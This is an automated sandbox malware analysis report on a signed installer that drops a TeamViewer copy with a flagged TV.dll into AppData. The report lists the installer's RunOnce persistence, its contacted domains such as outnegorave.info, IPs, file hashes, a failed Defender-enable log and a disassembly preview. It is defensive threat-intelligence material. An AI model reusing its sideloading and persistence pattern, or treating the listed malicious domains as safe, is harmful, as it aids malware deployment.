                                                                                                              http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=10241550&p=10000001c6TeamViewer.exe, 00000006.00000003.274797829.0000000005791000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000C.00000002.310885401.000002A416242000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://outnegorave.info/8C631A8/614&p=10000001TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    https://outnegorave.info/8C631A8/V3eTeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000C.00000003.285739811.000002A416231000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.TeamViewer.comTeamViewer.exe, TeamViewer.exe, 00000006.00000002.524713839.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.336944696.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.348837191.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.342853199.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000000.345802287.0000000000733000.00000002.00020000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://master15.teamviewer.com/din.aspx?s=39260701&client=DynGate&p=10000002gTeamViewer.exe, 00000006.00000003.281018743.0000000005748000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          https://outnegorave.info/TeamViewer.exe, 00000006.00000003.384741307.000000000575A000.00000004.00000001.sdmp, TeamViewer.exe, 00000006.00000003.374180078.000000000575A000.00000004.00000001.sdmp, TeamViewer.exe, 00000006.00000003.371647867.000000000575A000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://178.255.154.140/din.aspx?s=00000000&m=fast&client=DynGate&rnd=7666614&p=10000001pTeamViewer.exe, 00000006.00000003.291353124.000000000575A000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://www.teamviewer.com/ja/company/shutdown.aspx?version=TeamViewer.exe, 00000006.00000002.526986525.0000000002610000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=7666614&p=100000012TeamViewer.exe, 00000006.00000002.533222277.0000000005790000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000C.00000002.310813443.000002A41623D000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://go.teamviewer.comn077Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://outnegorave.info/B8C631A8/lPanel.dllTeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001mTeamViewer.exe, 00000006.00000002.526646142.0000000000B86000.00000004.00000020.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://sectigo.com/CPS077Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://178.255.154.140/dout.aspx?s=12652280&p=10000001&client=DynGateuTeamViewer.exe, 00000006.00000003.281018743.0000000005748000.00000004.00000001.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    http://178.255.154.140/dout.aspx?s=12652280&p=10000001&client=DynGatetTeamViewer.exe, 00000006.00000003.281018743.0000000005748000.00000004.00000001.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown

                                                                                                                                    Contacted IPs


                                                                                                                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
178.255.154.140 | unknown | Austria | 42473 | AS-ANEXIAANEXIAInternetdienstleistungsGmbHAT | false
172.67.205.33 | outnegorave.info | United States | 13335 | CLOUDFLARENETUS | false
185.188.32.25 | master15.teamviewer.com | Germany | 43304 | TEAMVIEWER-ASDE | false

                                                                                                                                    Private

                                                                                                                                    IP
                                                                                                                                    127.0.0.1

                                                                                                                                    General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 483795
Start date: 15.09.2021
Start time: 13:50:07
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 14m 14s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 77Etc0bR2v.bin (renamed file extension from bin to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                                                                                                                    Technologies:
                                                                                                                                    • HCA enabled
                                                                                                                                    • EGA enabled
                                                                                                                                    • HDC enabled
                                                                                                                                    • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal80.evad.winEXE@22/12@4/4
EGA Information: Failed
HDC Information:
• Successful, ratio: 15.5% (good quality ratio 14.9%)
• Quality average: 83.7%
• Quality standard deviation: 24.8%
HCA Information: Failed
                                                                                                                                    Cookbook Comments:
                                                                                                                                    • Adjust boot time
                                                                                                                                    • Enable AMSI
                                                                                                                                    Warnings:
                                                                                                                                    • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe
                                                                                                                                    • TCP Packets have been reduced to 100
                                                                                                                                    • Excluded IPs from analysis (whitelisted): 92.122.145.220, 23.35.236.56, 93.184.220.29, 20.82.210.154, 40.112.88.60, 23.216.77.209, 23.216.77.208, 20.50.102.62
                                                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, cs9.wac.phicdn.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, ocsp.digicert.com, store-images.s-microsoft.com, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                    Simulations

                                                                                                                                    Behavior and APIs

Time | Type | Description
13:51:11 | API Interceptor | 2x Sleep call for process: svchost.exe modified
13:51:17 | API Interceptor | 39x Sleep call for process: TeamViewer.exe modified
13:51:26 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe" f
13:51:34 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe" f
13:52:30 | API Interceptor | 1x Sleep call for process: MpCmdRun.exe modified

                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                    IPs

                                                                                                                                    No context

                                                                                                                                    Domains

                                                                                                                                    No context

                                                                                                                                    ASN

                                                                                                                                    No context

                                                                                                                                    JA3 Fingerprints

                                                                                                                                    No context

                                                                                                                                    Dropped Files

                                                                                                                                    No context

                                                                                                                                    Created / dropped Files

                                                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):4096
                                                                                                                                    Entropy (8bit):0.5911798908653279
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:6:0FTTek1GaD0JOCEfMuaaD0JOCEfMKQmDwg/tAl/gz2cE0fMbhEZolrRSQ2hyYIIT:0fGaD0JcaaD0JwQQVtAg/0bjSQJ
                                                                                                                                    MD5:4CB285EEFF119D1DFD0BC97E94936906
                                                                                                                                    SHA1:A7EA66C77EF4E8563579DF5AC2728AE57DD66F22
                                                                                                                                    SHA-256:737CE3AFFB100886870E7B2FFE3652436A7B98FF9C555A27B6F3103D48C98ACA
                                                                                                                                    SHA-512:30D669F598A628899402EB430D14A4E6B2CBFAA4B3ECE940FB2BE62C90FDE3D56160472DF53071EB5EEF892464FE622F6251D67ADD45244784AC27E1F10D19F3
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x87a573cd, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):32768
                                                                                                                                    Entropy (8bit):0.0947638796172184
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:6:GAGzwl/+sRIE11Y8TRXQWsH3MqKEAGzwl/+sRIE11Y8TRXQWsH3MqK:BG0+sO4blDsXHKTG0+sO4blDsXHK
                                                                                                                                    MD5:10044699896FCD83E6D2AACF7AD018CC
                                                                                                                                    SHA1:979085BC69FF906EB595D3B29B220897323B645A
                                                                                                                                    SHA-256:CFFBDCB3DE8A841FCAFBBC46D4C4D5CC7A3F9AE642560A02E0EAB93955D76165
                                                                                                                                    SHA-512:B8DEBCF36622C6EBA95262EB3B33E1211D715C7FB99074B9A3F9BD8ED22D11E7A67E3D371A30B6C5AC8B6485A33B0DA18A6AD96D4179D3C304A934A8F5D9743A
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):8192
                                                                                                                                    Entropy (8bit):0.10821565386287257
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Vq/7Evpjwkl+Al/bJdAtiJM///all:s/itl+At4SMG
                                                                                                                                    MD5:CA6DBB540336CC98DD443DEEE720D3A0
                                                                                                                                    SHA1:5043896148059D34A2CDC487DE4B6A8B67EE37EA
                                                                                                                                    SHA-256:1DA6B97F07296A4ECCA7F59CD7B4D9259E620609470AFC85436843439B8AAB9F
                                                                                                                                    SHA-512:8BB631F3AE6E8E3B6F25274A11DA69E1D851912A5C997B493DA37F15B9768031EEC2BC49A07CBB7078FC03B0BB5CE20546733862258035E8C2A0D9A98AF22632
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    C:\Users\user\AppData\Local\Temp\nsa6985.tmp
                                                                                                                                    Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):5132919
                                                                                                                                    Entropy (8bit):6.737705896318464
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:98304:FjdgHPmMogx1WZRkPapqj+ZG/D+AKbS5ZmfzCAW6LcTjH:tqHuMogsRkyq0umfzCgi
                                                                                                                                    MD5:E29F152B606F9669680D7CB24308991A
                                                                                                                                    SHA1:680CC154C050B90FEA35AD0FDB97E387D62B7740
                                                                                                                                    SHA-256:FF1A9205BD8076DE3811E5417AC2AEAC44D940F392B19C9D8A2833493CC8034F
                                                                                                                                    SHA-512:C33DB997837A716A0F09E0E40C61D92BADFAF2A440C8EBB5BAB9F156A2CC61E91DBF7CC748D074F7743E336F93080D4BDABBC14483A23036EC68C9DDEDC40DF5
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    C:\Users\user\AppData\Roaming\TeamViewer\TV.dll
                                                                                                                                    Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):75256
                                                                                                                                    Entropy (8bit):6.743019659267088
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:coaayOa9Z58qTGIT0XhZKfl2MjEzHPggfLD//qQmoz:p1uZ58qTGITey4zJfLD3qQmC
                                                                                                                                    MD5:A44F2649C82B35D42E6036D1C75E48C4
                                                                                                                                    SHA1:EE3B00701C97ED107B78ECBDF9D962F1508EDC8E
                                                                                                                                    SHA-256:760945429F7EA52C40C75A0FA0424D943E317EC48575C812545CC2C4BE5B0510
                                                                                                                                    SHA-512:B8340F06E3446AA91F435F4009557830BBC8E8279321F41198C076E8202869B98C156809CF3FAD8F900B569ACA2AB6B6A7725A1532E2846B31EDEC513E84734D
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 27%
                                                                                                                                    Reputation:unknown
                                                                                                                                    C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):4375848
                                                                                                                                    Entropy (8bit):6.621789733656387
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:98304:6jdgHPmMogx1WZRkPapqj+ZG/D+AKbS5m:4qHuMogsRkyq0N
                                                                                                                                    MD5:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                                    SHA1:A3A7498F02BAB188B3944382BBA4D016D63607D1
                                                                                                                                    SHA-256:D2CDCA8EFA27089D3DEAD0CCEAFBE470B3815C9C2A362C007D1F516E5379AC92
                                                                                                                                    SHA-512:412B42C540A9FE41709453D725B7A1E888849326A70A411E645F29240D730D69EBCF4B26E6870D33E0A395C612470BD00064025D22B0C6BCD211242E8EF6CEA6
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Reputation:unknown
                                                                                                                                    C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.ini
                                                                                                                                    Process:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:modified
                                                                                                                                    Size (bytes):2372
                                                                                                                                    Entropy (8bit):3.112142379658329
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:ztYv+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+S:9
                                                                                                                                    MD5:3A763054AEBA6DD14BFFC07A9668E0A9
                                                                                                                                    SHA1:ABA2EB735B1F9375BBC3CEFC9E44797E6448A4C4
                                                                                                                                    SHA-256:F8C4590C3B29AEBCE5530ECB5C1E59CAD18E50651310ECF2331ECBCDF6BC922C
                                                                                                                                    SHA-512:713486A3B8FD75587E097F11EE49E631C822743094A4AE34D957E1C1DACF656F0F2650B80B55F10510215632B2992B4CC5F43ACEF23CE7659EB19C74489EEE3E
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview: r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o.....h.p.n.=./.u.p.d.a.t.e./.....h.s.n.=.1.....h.t.=.6...../.B.8.C.6.3.1.A.8./.....h.s.n.=.1.....h.t.=.6.....1.3.6.....r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.
                                                                                                                                    C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll
                                                                                                                                    Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):607528
                                                                                                                                    Entropy (8bit):6.564133582926054
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:6144:r5hmfFy7ZJ0uUCAD06v7JlHZctms+2lifZ0iMe8d6YySkYQKMDqtAu3NhgGy6wSP:Vhmf4ACAzneosEi6YhvAuUGyUrNJbL
                                                                                                                                    MD5:554EE592B125CFDF81B376B5C24AA61C
                                                                                                                                    SHA1:666D2C04171246734575D4453289AA2D9AF93B97
                                                                                                                                    SHA-256:B296EF421D5B7F569E623D41A42D87A064C4358CFA89A192988F854929E3ABD1
                                                                                                                                    SHA-512:6C3111BF9D26929D426797EBDD8D804B34E2E8F593BF488298E70964538F2DA3D971C4ED3C3237C829AE7DE4FDB8D4316D84F153E93E3788808547A8538B73F5
                                                                                                                                    Malicious:false
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Reputation:unknown
                                                                                                                                    C:\Users\user\AppData\Roaming\TeamViewer\vpn.cab
                                                                                                                                    Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                                    File Type:Microsoft Cabinet archive data, 71196 bytes, 8 files
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):71196
                                                                                                                                    Entropy (8bit):7.996182851828797
                                                                                                                                    Encrypted:true
                                                                                                                                    SSDEEP:1536:qUTRtkxXFuG1DKNYCqRBiFxMZPQCJh/njgG5+jC5hA101pNO0:qUNtax12mCqRBiyQG/jgG5+j2NO0
                                                                                                                                    MD5:8A84AA1B9F20DC194947D7AC592D818E
                                                                                                                                    SHA1:4A77AB0D59F39BF600BB89D9121446F6AA2D139B
                                                                                                                                    SHA-256:8A740BE5D92B734E77B210354988DFD49F31C49814240513CF4B0353A8CE6DFB
                                                                                                                                    SHA-512:B3F90ADB48861CD775F15E75885C81A130D62DFE429A5833FA1CE0BC203EEA15BD8A7306618B1F4D27810493300400C8B149D58032F90F0E9D93B04F9B8F1050
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview: MSCF............,...............JA..H........)........k<'b..64\teamviewervpn.cat......)....k<'b..64\TeamViewerVPN.inf.(....>....k<'b..64\teamviewervpn.sys..<........k<&b..64\install.exe..)........k<'b..86\teamviewervpn.cat......-....k<'b..86\TeamViewerVPN.inf..b...B....k<'b..86\teamviewervpn.sys...........k<&b..86\install.exe.h.t"X<..[.....`.....@...N.f.|..U.......$."..L.F..4....|....U$Q/...%.J).D...@F.......f...9..../@.x;.N..w..2...i1P.....O.....T...T.y...``...;.$.&....@........@..~..\...J.44...:.@....M.....x\.0c|..W...,.|.x..+.P..N.. ..S0@B.;?.(..B..,.%.{.. ....(T.....U.5..=.3'rxci.;....P$..H)...1...h._e..{....Q._..}...K......U.s...._..WRWlS.8.._...D.NI..>.|O<..q...$0.EA*8d...../..=@2q...g_.Hs|`+...`.>U..)X.G*.8.....>..!4 ....}..Ps.a.8.......4.0`._t%...P.qgr..'..~.d..r.....o...w..q........,O.K..Y.8..M.D...p........~.....O?......}@.....>....O..N...c../p..[....._=.~.S....Q..p.O...@.WL....*..}..%1...3a.....u...)..K.Y...s..E;...".e.....X0(IR..'..1...\..6...(i
                                                                                                                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):55
                                                                                                                                    Entropy (8bit):4.306461250274409
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                                                    Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:modified
                                                                                                                                    Size (bytes):906
                                                                                                                                    Entropy (8bit):3.14662995254944
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:58KRBubdpkoF1AG3rlsQlw3IHe0k9+MlWlLehB4yAq7ejCEsQlw3IHy:OaqdmuF3rlp+T3+kWReH4yJ7MNp+B
                                                                                                                                    MD5:0EAC1BAA62604D45C05D6FD1407B4089
                                                                                                                                    SHA1:2D25DA7AFE0015AE800B53C76B6A4C7D61C4002B
                                                                                                                                    SHA-256:EDD329DE78C018022DD968702A2EEABE7D4C215302AB63798FFA681A02999351
                                                                                                                                    SHA-512:3CF1D73352067BD3F848CC46D3A57E0315AAA20342ACAE432CC481CF2B78FF7F7DFCE5D0C8D25FFF410A507AA6F99FB2CA28CFA7DAE95B9E6DB0982F555ACE7B
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
Preview:
-------------------------------------------------------------------------------------
MpCmdRun: Command Line: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
 Start Time: Wed Sep 15 2021 13:52:29

MpEnsureProcessMitigationPolicy: hr = 0x1
WDEnable
ERROR: MpWDEnable(TRUE) failed (800704EC)
MpCmdRun: End Time: Wed Sep 15 2021 13:52:30
-------------------------------------------------------------------------------------

                                                                                                                                    Static File Info

                                                                                                                                    General

                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                    Entropy (8bit):7.973639636653341
                                                                                                                                    TrID:
                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                                                    • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                    File name:77Etc0bR2v.exe
                                                                                                                                    File size:1828192
                                                                                                                                    MD5:e71e3b995477081569ed357e4d403666
                                                                                                                                    SHA1:809c4cc4ae51fcf3eca24e7d7fa5c1b6b5db52ce
                                                                                                                                    SHA256:94b9abbe10bd9d6abcb8dce27814992bf7a09ed416c66998bd3496bda1490713
                                                                                                                                    SHA512:2dca79011e40164672f7d81ed42fa9f080bca7148e451a0bf94c6bf0f6381e6eb8ee1bc3bac14e690304410a43f46994bfae76ee7d8ee2785ffaecb02f9ebd3b
                                                                                                                                    SSDEEP:49152:OBGHLrZP7auvm8sJEkbxH0ulBuw8ZtTUZEoH+hE:vrdTauvkERulBaUZEoH+h
                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L.....*J.................\.........

                                                                                                                                    File Icon

                                                                                                                                    Icon Hash:c403939c989380c8

                                                                                                                                    Static PE Info

                                                                                                                                    General

                                                                                                                                    Entrypoint:0x40323c
                                                                                                                                    Entrypoint Section:.text
                                                                                                                                    Digitally signed:true
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    Subsystem:windows gui
                                                                                                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                    Time Stamp:0x4A2AE2A2 [Sat Jun 6 21:41:54 2009 UTC]
                                                                                                                                    TLS Callbacks:
                                                                                                                                    CLR (.Net) Version:
                                                                                                                                    OS Version Major:4
                                                                                                                                    OS Version Minor:0
                                                                                                                                    File Version Major:4
                                                                                                                                    File Version Minor:0
                                                                                                                                    Subsystem Version Major:4
                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                    Import Hash:5bd07784f328e868356a895d4ab1a505

                                                                                                                                    Authenticode Signature

                                                                                                                                    Signature Valid:true
                                                                                                                                    Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                                                                    Signature Validation Error:The operation completed successfully
                                                                                                                                    Error Number:0
                                                                                                                                    Not Before, Not After
• 6/3/2021 5:00:00 PM, 6/4/2022 4:59:59 PM
                                                                                                                                    Subject Chain
                                                                                                                                    • CN=Hartex LLC, O=Hartex LLC, L=Moscow, C=RU
                                                                                                                                    Version:3
                                                                                                                                    Thumbprint MD5:5D5CA7E8D78224799E8AA101FF486137
                                                                                                                                    Thumbprint SHA-1:319517761E92EC6EEF1966A5994570D46A498093
                                                                                                                                    Thumbprint SHA-256:AC50A5D91A71BA8447EE795FF966E625AEC004E49EB24ADAA366B988686B65A5
                                                                                                                                    Serial:009B576882CCDB891FD6E4A66671F3AC71

                                                                                                                                    Entrypoint Preview

                                                                                                                                    Instruction
                                                                                                                                    sub esp, 00000180h
                                                                                                                                    push ebx
                                                                                                                                    push ebp
                                                                                                                                    push esi
                                                                                                                                    xor ebx, ebx
                                                                                                                                    push edi
                                                                                                                                    mov dword ptr [esp+18h], ebx
                                                                                                                                    mov dword ptr [esp+10h], 00409130h
                                                                                                                                    xor esi, esi
                                                                                                                                    mov byte ptr [esp+14h], 00000020h
